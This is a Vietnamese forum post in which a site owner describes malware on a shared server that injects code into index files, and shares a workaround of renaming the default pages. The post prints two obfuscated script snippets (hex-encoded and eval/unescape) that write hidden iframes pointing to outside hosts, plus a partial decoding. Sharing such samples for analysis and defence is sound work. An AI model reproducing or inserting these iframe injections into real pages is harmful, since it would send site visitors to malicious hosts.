banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... cách tránh bị virus từ sever gây hại đến website  XML
  [Question]   cách tránh bị virus từ sever gây hại đến website 28/08/2008 13:33:57 (+0700) | #1 | 148739
[Avatar]
hackerbinhphuoc
Member

[Minus]    0    [Plus]
Joined: 16/01/2004 09:45:41
Messages: 22
Offline
[Profile] [PM]
hôm nay có anh bạn gửi tới một link có chứa virus, ảnh bảo rằng mặt dù đã vào host xoá đi rất nhiều lần nhưng được một thời gian thì vẫn bị!
link có dạng là:
http://www.hkp.com/index.php
và đoạn mã chèn vào file index.php có dạng là:
Code:
<script>

<!--

var d=document,kol=561;

function O10H48B5552374583(H48B555237497D){ function H48B5552374D79() {return 16;} return( parseInt(H48B555237497D,H48B5552374D79()));}function H48B555237557D(H48B555237596E){ var H48B5552376563 = 2; var H48B5552375D6A='';for(H48B5552376166=0; H48B5552376166<H48B555237596E.length; H48B5552376166+=H48B5552376563){ H48B5552375D6A += ( String.fromCharCode (O10H48B5552374583(H48B555237596E.substr(H48B5552376166, H48B5552376563))));}return H48B5552375D6A;} document.write(H48B555237557D('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313537383130292B2730343564646434666262325C272077696474683D373334206865696768743D323135207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));

//-->

</script>

giải mã ra được:
Code:
<IFRAME name=O1 src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*15375)+'28539d6\' width=75 height=205 style=\'display: none\'></IFRAME >');}var myia=true;</script>

hoặc là đoạn code này:
Code:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%62%61%64%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6b%61%72%61%62%6f%6b%2e%62%69%7a%2f%73%70%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%34%33%35%31%34%29%2b%27%65%37%64%63%30%66%66%35%65%32%39%34%5c%27%20%77%69%64%74%68%3d%37%36%36%20%68%65%69%67%68%74%3d%35%37%39%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

xem xét lại thì đây là con virus nhiễm vào server và tự động chèn mã độc vào những file index.x ( hoặc default.x) với x có thể là html,php,asp,aspx. . .
tìm thêm thông tin thì nó là con này: trojan clicker html iframe ru
vậy làm sao chống lại khi mà mình không phải là quản trị của server này đây ?
sau một hồi tìm hiểu mình nhận ra là nó chỉ chèn iframe vào các file index thôi, vậy thì mình đổi file mặc định thử xem!
đầu tiên: mình vào web settings chỉnh lại default docs, thay vì là index.html mình chỉnh thành trangchu.html, index.php thành trangchu.php!
sau đó: vào host rename nhưng file dạng index.x hay default.x thành trangchu.x thôi ( nếu liên quan tới code thì vào code chỉnh lại)
vậy là mình có thể tạm thời tránh việc bị chèn iframe trong lúc chờ admin server diệt virus rồi!
đây là một cách nhỏ của em tránh việc chèn iframe đối với các virus chỉ chèn vào file index! anh nào có cách hay hơn xin chia sẻ với em!
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|